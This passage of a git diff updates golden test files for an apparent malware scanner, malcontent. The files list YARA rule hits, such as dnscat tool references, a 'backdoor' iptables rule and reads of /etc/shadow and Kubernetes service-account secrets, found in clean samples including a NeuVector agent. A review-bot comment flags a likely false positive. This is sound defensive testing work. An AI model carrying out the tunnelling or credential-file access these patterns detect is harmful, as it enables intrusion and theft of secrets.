[./util/info.js](https://github.com/search?q=.%2Futil%2Finfo.js&type=code)
[./util/schema.js](https://github.com/search?q=.%2Futil%2Fschema.js&type=code)
[./util/tooltip/translate](https://github.com/search?q=.%2Futil%2Ftooltip%2Ftranslate&type=code)
[./util/types.js](https://github.com/search?q=.%2Futil%2Ftypes.js&type=code)
[./util/utils](https://github.com/search?q=.%2Futil%2Futils&type=code)
[./utils/batch](https://github.com/search?q=.%2Futils%2Fbatch&type=code)
[./utils/dimensions](https://github.com/search?q=.%2Futils%2Fdimensions&type=code)
[./utils/empties](https://github.com/search?q=.%2Futils%2Fempties&type=code)
[./utils/errors](https://github.com/search?q=.%2Futils%2Ferrors&type=code)
[./utils/escape](https://github.com/search?q=.%2Futils%2Fescape&type=code)
[./utils/flatten](https://github.com/search?q=.%2Futils%2Fflatten&type=code)
[./utils/hash](https://github.com/search?q=.%2Futils%2Fhash&type=code)
[./utils/index](https://github.com/search?q=.%2Futils%2Findex&type=code)
[./utils/interleave](https://github.com/search?q=.%2Futils%2Finterleave&type=code)
[./utils/nonce](https://github.com/search?q=.%2Futils%2Fnonce&type=code)
[./utils/reflow](https://github.com/search?q=.%2Futils%2Freflow&type=code)
[./utils/stylis](https://github.com/search?q=.%2Futils%2Fstylis&type=code)
[./utils/warning](https://github.com/search?q=.%2Futils%2Fwarning&type=code)
[./valid-routes](https://github.com/search?q=.%2Fvalid-routes&type=code)
[./value.js](https://github.com/search?q=.%2Fvalue.js&type=code)
[./web/interfaces](https://github.com/search?q=.%2Fweb%2Finterfaces&type=code)
[./web/text](https://github.com/search?q=.%2Fweb%2Ftext&type=code)
[./webpack/bootstrap](https://github.com/search?q=.%2Fwebpack%2Fbootstrap&type=code)
[./webpack/runtime/compat get default](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fcompat+get+default&type=code)
[./webpack/runtime/ensure chunk](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fensure+chunk&type=code)
[./webpack/runtime/get mini-css chunk](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fget+mini-css+chunk&type=code)
[./webpack/runtime/global](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fglobal&type=code)
[./webpack/runtime/load script](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fload+script&type=code)
[./webpack/runtime/nonce](https://github.com/search?q=.%2Fwebpack%2Fruntime%2Fnonce&type=code)
[./week.js](https://github.com/search?q=.%2Fweek.js&type=code)
[./worker](https://github.com/search?q=.%2Fworker&type=code)
[./xfa](https://github.com/search?q=.%2Fxfa&type=code)
[./year.js](https://github.com/search?q=.%2Fyear.js&type=code)
[./zone.js](https://github.com/search?q=.%2Fzone.js&type=code)
[chmod u+rxw](https://github.com/search?q=chmod+u%2Brxw&type=code)
[curl ShareErr: WriteUnsetTitle](https://github.com/search?q=curl+ShareErr%3A+WriteUnsetTitle&type=code)
[curl command for prefixes.could not parse](https://github.com/search?q=curl+command+for+prefixes.could+not+parse&type=code)
[curl command for upload](https://github.com/search?q=curl+command+for+upload&type=code)
[curl command to allow upload access for a single object. Command expires in 7 days](https://github.com/search?q=curl+command+to+allow+upload+access+for+a+single+object.+Command+expires+in+7+days&type=code)
[curl command to allow upload access of only](https://github.com/search?q=curl+command+to+allow+upload+access+of+only&type=code)
[curl command to allow upload access to a folder. Command expires in 120 hours.](https://github.com/search?q=curl+command+to+allow+upload+access+to+a+folder.+Command+expires+in+120+hours.&type=code)
[curl command to allow upload access to any objects matching the key prefix](https://github.com/search?q=curl+command+to+allow+upload+access+to+any+objects+matching+the+key+prefix&type=code) | | MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"host"](https://github.com/search?q=json%3A%22host%22&type=code)
[json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Ca+href%3E&type=code)
[[](https://github.com/search?q=%3Chtml%3E&type=code)
[DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code) |
diff --git a/test_data/linux/clean/misp_sample.ndjson.log.simple b/test_data/linux/clean/misp_sample.ndjson.log.simple
new file mode 100644
index 00000000..f9874158
--- /dev/null
+++ b/test_data/linux/clean/misp_sample.ndjson.log.simple
@@ -0,0 +1,12 @@
+# linux/clean/misp_sample.ndjson.log: critical
+3P/threat_hunting/pastebin: medium
+crypto/aes: low
+fd/multiplex: low
+ref/ip: medium
+ref/site/download: high
+ref/site/php: medium
+ref/site/url: low
+ref/words/backdoor: high
+ref/words/decryptor: medium
+ref/words/ransomware/lvt: medium
+ref/words/rootkit: high
diff --git a/test_data/linux/clean/mongosh.simple b/test_data/linux/clean/mongosh.simple
index 5740cb6b..3fddc9a7 100644
--- a/test_data/linux/clean/mongosh.simple
+++ b/test_data/linux/clean/mongosh.simple
@@ -3,7 +3,6 @@ archives/unarchive: medium
 cloud/aws/metadata: low
 cloud/google/metadata: low
 combo/backdoor/kill_rm: medium
-combo/critical_paths: medium
 combo/dropper/shell: medium
 combo/net/scan_tool: medium
 combo/net/tunnel_proxy: medium
diff --git a/test_data/linux/clean/neuvector-agent.aarch64.md b/test_data/linux/clean/neuvector-agent.aarch64.md
index 888cb660..2d4bb16a 100644
--- a/test_data/linux/clean/neuvector-agent.aarch64.md
+++ b/test_data/linux/clean/neuvector-agent.aarch64.md
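Review bot: The new golden file test_data/linux/clean/misp_sample.ndjson.log.simple records a `critical` overall verdict for a sample that lives under `clean/`, so the fixture locks in what looks like a false positive instead of guarding against one; the contributing findings are `ref/site/download: high`, `ref/words/backdoor: high` and `ref/words/rootkit: high`, which on a threat-intel export are presumably indicator text rather than behaviour. If this sample is intentionally kept as a known false-positive regression case, the commit description should say so, since nothing in the fixture format marks it as expected-but-wrong. Otherwise the word/URL reference rules that fire here may need narrowing (or a lower severity) before the expectation is committed; I cannot tell from this hunk which of the two is intended.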
@@ -1,143 +1,142 @@ ## linux/clean/neuvector-agent.aarch64 [⚠️ MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|------------------------------------------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [3P/threat_hunting/dnscat](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#dnscat_offensive_tool_keyword) | [references 'dnscat' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [dnscat](https://github.com/search?q=dnscat&type=code) | -| MEDIUM | [3P/threat_hunting/tcpdump](https://github.com/chainguard-dev/malcontent/blob/main/rules/yara/threat_hunting/all.yara#tcpdump_greyware_tool_keyword) | [references 'tcpdump' tool](https://github.com/mthcht/ThreatHunting-Keywords), by mthcht | [tcpdump](https://github.com/search?q=tcpdump&type=code) | -| MEDIUM | [archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/archives/zip.yara#zip) | Works with zip files | [archive/zip](https://github.com/search?q=archive%2Fzip&type=code) | -| MEDIUM | [combo/backdoor/iptables](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/backdoor/iptables.yara#iptables_upload_http) | uploads, uses iptables and HTTP | [HTTP](https://github.com/search?q=HTTP&type=code)
[iptables -](https://github.com/search?q=iptables+-&type=code)
[iptables-savegraceful](https://github.com/search?q=iptables-savegraceful&type=code)
[iptablessent](https://github.com/search?q=iptablessent&type=code)
[uploadCurrentInfo](https://github.com/search?q=uploadCurrentInfo&type=code)
[uploadgoogle](https://github.com/search?q=uploadgoogle&type=code)
[uploads](https://github.com/search?q=uploads&type=code) | -| MEDIUM | [combo/critical_paths](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/critical_paths.yara#linux_critical_system_paths_medium) | accesses multiple critical Linux paths | [/proc/1/exe/etc/passwd/etc/shadowFMON](https://github.com/search?q=%2Fproc%2F1%2Fexe%2Fetc%2Fpasswd%2Fetc%2FshadowFMON&type=code)
[/proc/1/net/etc/login.defs/proc/](https://github.com/search?q=%2Fproc%2F1%2Fnet%2Fetc%2Flogin.defs%2Fproc%2F&type=code)
[/proc/1/root/containers](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fcontainers&type=code)
[/proc/1/root/etc/crio/crio.conf.d/00-d](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fetc%2Fcrio%2Fcrio.conf.d%2F00-d&type=code)
[/proc/1/root/etc/crio/crio.conf/run/co](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fetc%2Fcrio%2Fcrio.conf%2Frun%2Fco&type=code)
[/proc/1/root/sys/fs/aufs/si_](https://github.com/search?q=%2Fproc%2F1%2Froot%2Fsys%2Ffs%2Faufs%2Fsi_&type=code)
[/proc/1/rootFSN](https://github.com/search?q=%2Fproc%2F1%2FrootFSN&type=code)
[/proc/cpuinfo/proc/meminfo/etc/timezon](https://github.com/search?q=%2Fproc%2Fcpuinfo%2Fproc%2Fmeminfo%2Fetc%2Ftimezon&type=code)
[/proc/device_only/etc/shellssubmission](https://github.com/search?q=%2Fproc%2Fdevice_only%2Fetc%2Fshellssubmission&type=code)
[/proc/errno](https://github.com/search?q=%2Fproc%2Ferrno&type=code)
[/proc/meminfo/etc/timezone/dev/.udev/d](https://github.com/search?q=%2Fproc%2Fmeminfo%2Fetc%2Ftimezone%2Fdev%2F.udev%2Fd&type=code)
[/proc/mountsldb](https://github.com/search?q=%2Fproc%2Fmountsldb&type=code)
[/proc/self/auxv](https://github.com/search?q=%2Fproc%2Fself%2Fauxv&type=code)
[/proc/self/cgroup119209289550781255960](https://github.com/search?q=%2Fproc%2Fself%2Fcgroup119209289550781255960&type=code)
[/proc/self/exeunsafe.Pointer](https://github.com/search?q=%2Fproc%2Fself%2Fexeunsafe.Pointer&type=code)
[/proc/self/fd/](https://github.com/search?q=%2Fproc%2Fself%2Ffd%2F&type=code)
[/proc/self/gid_map](https://github.com/search?q=%2Fproc%2Fself%2Fgid_map&type=code)
[/proc/self/mapsGNU.sparse.nameGNU.spar](https://github.com/search?q=%2Fproc%2Fself%2FmapsGNU.sparse.nameGNU.spar&type=code)
[/proc/self/mountinfowindow](https://github.com/search?q=%2Fproc%2Fself%2Fmountinfowindow&type=code)
[/proc/self/setgroups](https://github.com/search?q=%2Fproc%2Fself%2Fsetgroups&type=code)
[/proc/self/statusgogoproto.onlyonegogo](https://github.com/search?q=%2Fproc%2Fself%2Fstatusgogoproto.onlyonegogo&type=code)
[/proc/self/uid_mapCAP_SYS_TTY_CONFIGgo](https://github.com/search?q=%2Fproc%2Fself%2Fuid_mapCAP_SYS_TTY_CONFIGgo&type=code)
[/proc/selfjumboframekube-proxyhost-ben](https://github.com/search?q=%2Fproc%2Fselfjumboframekube-proxyhost-ben&type=code)
[/proc/sys/kernel/hostnamereflect](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fhostnamereflect&type=code)
[/proc/sys/kernel/osrelease../devices/p](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fosrelease..%2Fdevices%2Fp&type=code)
[/proc/sys/kernel/versionzip](https://github.com/search?q=%2Fproc%2Fsys%2Fkernel%2Fversionzip&type=code)
[/proc/sys/net/core/somaxconn1818989403](https://github.com/search?q=%2Fproc%2Fsys%2Fnet%2Fcore%2Fsomaxconn1818989403&type=code)
[/proc/var//sbinpInfo/rootSwarmD.2.5D.2](https://github.com/search?q=%2Fproc%2Fvar%2F%2FsbinpInfo%2FrootSwarmD.2.5D.2&type=code)
[/sys/class/dmi/id/bios_date/lib64/ld-linux](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fbios_date%2Flib64%2Fld-linux&type=code)
[/sys/class/dmi/id/bios_vendorruntime.v1alp](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fbios_vendorruntime.v1alp&type=code)
[/sys/class/dmi/id/bios_version/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fbios_version%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/board_asset_tag/sys/clas](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_asset_tag%2Fsys%2Fclas&type=code)
[/sys/class/dmi/id/board_name/sys/firmware/](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_name%2Fsys%2Ffirmware%2F&type=code)
[/sys/class/dmi/id/board_serial/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_serial%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/board_vendor/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_vendor%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/board_versionruntime.v1a](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fboard_versionruntime.v1a&type=code)
[/sys/class/dmi/id/chassis_asset_tagruntime](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_asset_tagruntime&type=code)
[/sys/class/dmi/id/chassis_serial/sys/class](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_serial%2Fsys%2Fclass&type=code)
[/sys/class/dmi/id/chassis_type/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_type%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/chassis_vendor/sys/class](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_vendor%2Fsys%2Fclass&type=code)
[/sys/class/dmi/id/chassis_version/sys/clas](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fchassis_version%2Fsys%2Fclas&type=code)
[/sys/class/dmi/id/product_name/sys/class/d](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_name%2Fsys%2Fclass%2Fd&type=code)
[/sys/class/dmi/id/product_serialruntime.v1](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_serialruntime.v1&type=code)
[/sys/class/dmi/id/product_uuidruntime.v1al](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_uuidruntime.v1al&type=code)
[/sys/class/dmi/id/product_versionruntime.v](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fproduct_versionruntime.v&type=code)
[/sys/class/dmi/id/sys_vendorruntime.v1alph](https://github.com/search?q=%2Fsys%2Fclass%2Fdmi%2Fid%2Fsys_vendorruntime.v1alph&type=code)
[/sys/class/net/run/udev/data/](https://github.com/search?q=%2Fsys%2Fclass%2Fnet%2Frun%2Fudev%2Fdata%2F&type=code)
[/sys/devices/system/xen_memory/xen_memory0/t](https://github.com/search?q=%2Fsys%2Fdevices%2Fsystem%2Fxen_memory%2Fxen_memory0%2Ft&type=code)
[/tmp/cis-1.23/kube-apiservercontainer](https://github.com/search?q=%2Ftmp%2Fcis-1.23%2Fkube-apiservercontainer&type=code)
[/tmp/cis-1.24//tmp/cis-1.23/kube-apis](https://github.com/search?q=%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-1.23%2Fkube-apis&type=code)
[/tmp/cis-1.8.0//tmp/cis-1.6.0/run](https://github.com/search?q=%2Ftmp%2Fcis-1.8.0%2F%2Ftmp%2Fcis-1.6.0%2Frun&type=code)
[/tmp/container.shfile](https://github.com/search?q=%2Ftmp%2Fcontainer.shfile&type=code)
[/tmp/ctrl_listen.sockFailed](https://github.com/search?q=%2Ftmp%2Fctrl_listen.sockFailed&type=code)
[/tmp/dp_client.](https://github.com/search?q=%2Ftmp%2Fdp_client.&type=code)
[/tmp/dp_listen.sockRead](https://github.com/search?q=%2Ftmp%2Fdp_listen.sockRead&type=code)
[/tmp/host.shInactiveAnonobject/host/b](https://github.com/search?q=%2Ftmp%2Fhost.shInactiveAnonobject%2Fhost%2Fb&type=code)
[/tmp/kube_master.sh/tmp/kube_worker.s](https://github.com/search?q=%2Ftmp%2Fkube_master.sh%2Ftmp%2Fkube_worker.s&type=code)
[/tmp/kube_worker.sh](https://github.com/search?q=%2Ftmp%2Fkube_worker.sh&type=code)
[/tmp/neuvector/consul.json](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fconsul.json&type=code)
[/tmp/neuvector/raft/peers.json/etc/ne](https://github.com/search?q=%2Ftmp%2Fneuvector%2Fraft%2Fpeers.json%2Fetc%2Fne&type=code)
[/tmp/neuvectorcan](https://github.com/search?q=%2Ftmp%2Fneuvectorcan&type=code)
[/tmp/ready](https://github.com/search?q=%2Ftmp%2Fready&type=code)
[/tmp/rh-1.4.0//tmp/cis-1.24//tmp/cis-](https://github.com/search?q=%2Ftmp%2Frh-1.4.0%2F%2Ftmp%2Fcis-1.24%2F%2Ftmp%2Fcis-&type=code)
[/tmp/walkWorkload](https://github.com/search?q=%2Ftmp%2FwalkWorkload&type=code)
[/usr/bin/calico-nodePROC](https://github.com/search?q=%2Fusr%2Fbin%2Fcalico-nodePROC&type=code)
[/usr/bin/csp-billing-adapterio.kubernete](https://github.com/search?q=%2Fusr%2Fbin%2Fcsp-billing-adapterio.kubernete&type=code)
[/usr/bin/curliptables-savegraceful_stop](https://github.com/search?q=%2Fusr%2Fbin%2Fcurliptables-savegraceful_stop&type=code)
[/usr/bin/getconf/usr/bin/timeoutcontext](https://github.com/search?q=%2Fusr%2Fbin%2Fgetconf%2Fusr%2Fbin%2Ftimeoutcontext&type=code)
[/usr/bin/getentduplicated](https://github.com/search?q=%2Fusr%2Fbin%2Fgetentduplicated&type=code)
[/usr/bin/jqsupervisord.WithCancelgrpc.Se](https://github.com/search?q=%2Fusr%2Fbin%2Fjqsupervisord.WithCancelgrpc.Se&type=code)
[/usr/bin/lsof/usr/bin/curliptables-saveg](https://github.com/search?q=%2Fusr%2Fbin%2Flsof%2Fusr%2Fbin%2Fcurliptables-saveg&type=code)
[/usr/bin/pod/sbin/sysctl/usr/bin/topconf](https://github.com/search?q=%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr%2Fbin%2Ftopconf&type=code)
[/usr/bin/supervisordAdd](https://github.com/search?q=%2Fusr%2Fbin%2FsupervisordAdd&type=code)
[/usr/bin/tee/usr/bin/pod/sbin/sysctl/usr](https://github.com/search?q=%2Fusr%2Fbin%2Ftee%2Fusr%2Fbin%2Fpod%2Fsbin%2Fsysctl%2Fusr&type=code)
[/usr/bin/topconfigure.shcontext.TODOcont](https://github.com/search?q=%2Fusr%2Fbin%2Ftopconfigure.shcontext.TODOcont&type=code)
[/usr/bin/uname/usr/bin/iconvPROC](https://github.com/search?q=%2Fusr%2Fbin%2Funame%2Fusr%2Fbin%2FiconvPROC&type=code)
[/usr/binfan_testcapBlockprocPathfullPath](https://github.com/search?q=%2Fusr%2Fbinfan_testcapBlockprocPathfullPath&type=code)
[/var/run/cri-dockerd.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcri-dockerd.sockFile&type=code)
[/var/run/crio/crio.sockFile](https://github.com/search?q=%2Fvar%2Frun%2Fcrio%2Fcrio.sockFile&type=code)
[/var/run/docker.sock/var/lib/dpkg/status](https://github.com/search?q=%2Fvar%2Frun%2Fdocker.sock%2Fvar%2Flib%2Fdpkg%2Fstatus&type=code)
[/var/run/dockershim.sock/var/lib/rpm/Pac](https://github.com/search?q=%2Fvar%2Frun%2Fdockershim.sock%2Fvar%2Flib%2Frpm%2FPac&type=code)
[/var/run/openvswitch/Error](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2FError&type=code)
[/var/run/openvswitch/db.sockNotify](https://github.com/search?q=%2Fvar%2Frun%2Fopenvswitch%2Fdb.sockNotify&type=code)
[/var/run/secrets/kubernetes.io/serviceac](https://github.com/search?q=%2Fvar%2Frun%2Fsecrets%2Fkubernetes.io%2Fserviceac&type=code)
[sysctl,](https://github.com/search?q=sysctl%2C&type=code) | -| MEDIUM | [combo/net/host_port](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/host_port.yara#go_scan_tool_val) | Uses struct with JSON representations for host:port | [json:"hostname"](https://github.com/search?q=json%3A%22hostname%22&type=code)
[json:"ip"](https://github.com/search?q=json%3A%22ip%22&type=code)
[json:"port"](https://github.com/search?q=json%3A%22port%22&type=code) | -| MEDIUM | [combo/net/tunnel_proxy](https://github.com/chainguard-dev/malcontent/blob/main/rules/combo/net/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [Proxy](https://github.com/search?q=Proxy&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | -| MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-html.yara#html) | Contains HTML content | [](https://github.com/search?q=%3Chtml%3E&type=code) | -| MEDIUM | [data/embedded/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded-zstd.yara#embedded_zstd) | [Contains compressed content in ZStandard format](https://github.com/facebook/zstd) | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code) | -| MEDIUM | [databases/mysql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/mysql.yara#mysql) | accesses MySQL databases | [mysql](https://github.com/search?q=mysql&type=code) | -| MEDIUM | [databases/postgresql](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/postgresql.yara#postgresql) | accesses PostgreSQL databases | [postgresql](https://github.com/search?q=postgresql&type=code) | -| MEDIUM | [databases/sqlite](https://github.com/chainguard-dev/malcontent/blob/main/rules/databases/sqlite.yara#sqlite) | accesses SQLite databases | [sqlite3](https://github.com/search?q=sqlite3&type=code) | -| MEDIUM | [evasion/content/length/0](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/content-length-0.yara#content_length_0) | Sets HTTP content length to zero | [Content-Length: 0](https://github.com/search?q=Content-Length%3A+0&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd.yara#exec) | executes a command | [evaluateRuntimeCmd](https://github.com/search?q=evaluateRuntimeCmd&type=code)
[isAllowIpRuntimeCommand](https://github.com/search?q=isAllowIpRuntimeCommand&type=code)
[isAllowRuncInitCommand](https://github.com/search?q=isAllowRuncInitCommand&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program.yara#exec_cmd_run) | executes external programs | [).CombinedOutput](https://github.com/search?q=%29.CombinedOutput&type=code)
[exec.(*Cmd).Run](https://github.com/search?q=exec.%28%2ACmd%29.Run&type=code) | -| MEDIUM | [fs/attributes/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/attributes/set.yara#remove_xattr) | [set an extended file attribute value](https://developer.apple.com/library/archive/documentation/System/Conceptual/ManPages_iPhoneOS/man2/setxattr.2.html) | [setxattr](https://github.com/search?q=setxattr&type=code) | -| MEDIUM | [fs/file/times/set](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file-times-set.yara#utimes) | [change file last access and modification times](https://linux.die.net/man/2/utimes) | [utimes](https://github.com/search?q=utimes&type=code) | -| MEDIUM | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-chown.yara#Chown) | Changes file ownership | [Chown](https://github.com/search?q=Chown&type=code) | -| MEDIUM | [fs/permission/modify](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission-modify.yara#chmod) | [modifies file permissions](https://linux.die.net/man/1/chmod) | [Chmod](https://github.com/search?q=Chmod&type=code)
[chmod](https://github.com/search?q=chmod&type=code) | -| MEDIUM | [kernel/apparmor](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/apparmor.yara#apparmor) | Mentions 'apparmor' | [apparmor](https://github.com/search?q=apparmor&type=code) | -| MEDIUM | [kernel/dev/block/device](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/block-device.yara#block_devices) | works with block devices | [/sys/blocktimestampsdocker](https://github.com/search?q=%2Fsys%2Fblocktimestampsdocker&type=code) | -| MEDIUM | [kernel/dev/loopback](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/dev/loopback.yara#dev_loopback) | access virtual block devices (loopback) | [/dev/loop%dfusermount3low](https://github.com/search?q=%2Fdev%2Floop%25dfusermount3low&type=code) | -| MEDIUM | [kernel/sysinfo](https://github.com/chainguard-dev/malcontent/blob/main/rules/kernel/sysinfo.yara#sysinfo) | [get system information (load, swap)](https://man7.org/linux/man-pages/man2/sysinfo.2.html) | [sysinfo](https://github.com/search?q=sysinfo&type=code) | -| MEDIUM | [net/bpf](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/bpf.yara#bpf) | BPF (Berkeley Packet Filter) | [bpf](https://github.com/search?q=bpf&type=code) | -| MEDIUM | [net/dns/reverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns-reverse.yara#in_addr_arpa) | looks up the reverse hostname for an IP | [.in-addr.arpa](https://github.com/search?q=.in-addr.arpa&type=code)
[ip6.arpa](https://github.com/search?q=ip6.arpa&type=code) | -| MEDIUM | [net/download](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/download.yara#download) | download files | [CLUSSnifferDownloadshare](https://github.com/search?q=CLUSSnifferDownloadshare&type=code)
[MaxConcurrentDownloads](https://github.com/search?q=MaxConcurrentDownloads&type=code)
[portsessionsdownloadruleslen](https://github.com/search?q=portsessionsdownloadruleslen&type=code) | -| MEDIUM | [net/http/cookies](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http-cookies.yara#http_cookie) | [access HTTP resources using cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies) | [Cookie](https://github.com/search?q=Cookie&type=code)
